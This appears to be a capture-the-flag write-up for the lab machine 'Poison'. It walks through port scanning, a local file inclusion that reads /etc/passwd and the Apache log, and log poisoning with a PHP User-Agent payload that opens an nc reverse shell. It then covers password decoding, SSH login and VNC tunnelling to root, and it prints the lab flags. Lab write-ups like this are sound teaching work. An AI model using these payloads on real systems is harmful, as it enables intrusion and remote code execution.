Poison

Enumeration

As usual, we start with an nmap scan, in order to find open ports in the target machine.

The following nmap command will scan the target machine looking for open ports quickly and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.84 -oN allPorts

-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Tue Mar 22 20:00:10 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.84
Warning: 10.10.10.84 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.84
Host is up (0.060s latency).
Not shown: 58441 filtered tcp ports (no-response), 7092 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

# Nmap done at Tue Mar 22 20:00:49 2022 -- 1 IP address (1 host up) scanned in 38.45 seconds

As we see, there are a few ports open.

Let's try to obtain the services and versions of these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p22,80 10.10.10.84 -oN targeted

-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Tue Mar 22 20:01:39 2022 as: nmap -sCV -p22,80 -oN targeted 10.10.10.84
Nmap scan report for 10.10.10.84
Host is up (0.044s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 22 20:01:48 2022 -- 1 IP address (1 host up) scanned in 9.31 seconds

Let's take a look at the website.

If we put some of the .php files listed into the scriptname text field, and hit the Submit button, it will look like it is showing us the file.

Exploitation

We could try to do a Local File Inclusion (LFI) attack. If we put the /etc/passwd file, and hit Submit, we'll see that we can see the /etc/passwd file of the Poison machine, and we could also see that there are two users, the root user and the charix user.

curl -s 'http://10.10.10.84/browse.php?file=/etc/passwd'

root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
_tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin
messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin
avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin
cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin
charix:*:1001:1001:charix:/home/charix:/bin/csh

As nmap reported that the website is hosted by an Apache server, we could try to enumerate the Apache log file.

curl -s 'http://10.10.10.84/browse.php?file=/var/log/httpd-access.log'

192.168.253.133 - - [24/Jan/2018:18:33:25 +0100] "GET / HTTP/1.1" 200 289 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET / HTTP/1.0" 200 289 "-" "-"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET / HTTP/1.0" 200 289 "-" "-"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "POST /sdk HTTP/1.1" 404 201 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET /nmaplowercheck1521462526 HTTP/1.1" 404 222 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET / HTTP/1.1" 200 289 "-" "-"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET /HNAP1 HTTP/1.1" 404 203 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.10.14.19 - - [23/Mar/2022:19:44:25 +0100] "GET / HTTP/1.1" 200 289 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.87 Safari/537.36"
10.10.14.19 - - [23/Mar/2022:19:44:26 +0100] "GET /favicon.ico HTTP/1.1" 404 209 "http://10.10.10.84/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.87 Safari/537.36"
10.10.14.19 - - [23/Mar/2022:19:45:24 +0100] "GET /browse.php?file=ini.php HTTP/1.1" 200 20456 "http://10.10.10.84/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.87 Safari/537.36"
10.10.14.19 - - [23/Mar/2022:19:50:58 +0100] "GET /browse.php?file=/etc/passwd HTTP/1.1" 200 1894 "-" "curl/7.81.0"
10.10.14.19 - - [23/Mar/2022:19:54:13 +0100] "GET /browse.php?file=/var/log/httpd-access.log HTTP/1.1" 200 1610 "-" "curl/7.81.0"

The httpd-access.log file stores every request the server gets with information such us the IP address, the directory, the status code, the user agent, etc...

We could try to make a request to the HTTP server with a User-Agent header, which can contain PHP code that sends us back a reverse shell, so when we access the httpd-access.log file, the PHP code will be interpreted, and we'll get a reverse shell.

curl -s 'http://10.10.10.84/' -A "<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.19 4444 >/tmp/f') ?>"

Now the request is stored in the httpd-access.log log file. Before accessing it, let's set a netcat listener on port 4444.

nc -lvnp 4444

-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.

If we now access the log file with the browser, we should catch the reverse shell on the netcat listener.

http://10.10.10.84/browse.php?file=/var/log/httpd-access.log

listening on [any] 4444 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.84] 57237
sh: can't access tty; job control turned off
$ whoami
www

Privilege Escalation

If we list the current directory, we'll see the pwdbackup.txt file.

ls -l

-rw-r--r--  1 root  wheel    33 Jan 24  2018 browse.php
-rw-r--r--  1 root  wheel   289 Jan 24  2018 index.php
-rw-r--r--  1 root  wheel    27 Jan 24  2018 info.php
-rw-r--r--  1 root  wheel    33 Jan 24  2018 ini.php
-rw-r--r--  1 root  wheel    90 Jan 24  2018 listfiles.php
-rw-r--r--  1 root  wheel    20 Jan 24  2018 phpinfo.php
-rw-r--r--  1 root  wheel  1267 Mar 19  2018 pwdbackup.txt

If we take a look at it, we'll see a long base64 string.

cat pwdbackup.txt

This password is secure, it's encoded atleast 13 times.. what could go wrong really..

Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
Ukd4RVdub3dPVU5uUFQwSwo=

We can decode it, by putting the base64 string in the pwd64 file and executing the following command.

data=$(cat pwdB64); for i in $(seq 1 13); do data=$(echo $data | tr -d ' ' | base64 -d); done; echo $data

Charix!2#4%6&8(0

And we get a password. If we try to log in as the user charix with that password via SSH, we'll get in, and we could grab the user flag.

sshpass -p 'Charix!2#4%6&8(0' ssh charix@10.10.10.84

FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017

Welcome to FreeBSD!

Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories:   https://www.FreeBSD.org/security/
FreeBSD Handbook:      https://www.FreeBSD.org/handbook/
FreeBSD FAQ:           https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums:        https://forums.FreeBSD.org/

Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with:  pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.

Show the version of FreeBSD installed:  freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages:  man man
FreeBSD directory layout:      man hier

Edit /etc/motd to change this login announcement.
The default editor in FreeBSD is vi, which is efficient to use when you have
learned it, but somewhat user-unfriendly.  To use ee (an easier but less
powerful editor) instead, set the environment variable EDITOR to /usr/bin/ee
charix@Poison:~ % whoami
charix                                                                                                                                          
charix@Poison:~ % cat user.txt                                                                                                                  
eaacdfb2d141b72a589233063604209c

If we list the current directory, we'll see the secret.zip file.

ls -l

total 8                                                                                                                                         
-rw-r-----  1 root  charix  166 Mar 19  2018 secret.zip                                                                                         
-rw-r-----  1 root  charix   33 Mar 19  2018 user.txt

Let's transfer it to our local machine.

python -m SimpleHTTPServer

On our local machine.

wget http://10.10.10.84:8000/secret.zip

--2022-03-23 20:26:50--  http://10.10.10.84:8000/secret.zip
Connecting to 10.10.10.84:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 166 [application/zip]
Saving to: ‘secret.zip’

secret.zip                          100%[===================================================================>]     166  --.-KB/s    in 0s      

2022-03-23 20:26:50 (23.3 MB/s) - ‘secret.zip’ saved [166/166]

If we try to unzip it, it will ask for a password. Let's try the one we found earlier.

unzip secret.zip

Archive:  secret.zip
[secret.zip] secret password: Charix!2#4%6&8(0
 extracting: secret

And we get the secret file, which hash some weird content in it.

file secret

secret: Non-ISO extended-ASCII text, with no line terminators

If we keep enumerating the machine, we'll see that it is listening on a few ports we didn't see with nmap.

netstat -anp tcp

Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address          Foreign Address        (state)
tcp4       0      0 10.10.10.84.22         10.10.14.19.34178      ESTABLISHED
tcp4       0      0 10.10.10.84.80         10.10.14.19.46694      FIN_WAIT_2
tcp4       0      0 127.0.0.1.25           *.*                    LISTEN
tcp4       0      0 *.80                   *.*                    LISTEN
tcp6       0      0 *.80                   *.*                    LISTEN
tcp4       0      0 *.22                   *.*                    LISTEN
tcp6       0      0 *.22                   *.*                    LISTEN
tcp4       0      0 127.0.0.1.5801         *.*                    LISTEN
tcp4       0      0 127.0.0.1.5901         *.*                    LISTEN

We see the ports 5801 and 5901, which belong to VNC.

Virtual Network Computing (VNC) is a program based on a client-server structure that allows you to observe the actions of the server computer remotely through a client computer.

We can enumerate the VNC service with the vncviewer tool on our local machine. So let's tunnel that port to our local machine with SSH.

sshpass -p 'Charix!2#4%6&8(0' ssh charix@10.10.10.84 -L 5901:127.0.0.1:5901

Now we can enumerate the VNC service of the victim, through our 5901 port. The vncviewer tool has an option which allow us to authenticate with a password file. If we use the secret file that we have, we'll get a shell as the root user, and all we had to do is reap the harvest and take the root flag.

vncviewer 127.0.0.1:5901 -passwd secret

Last updated 2 years ago

Was this helpful?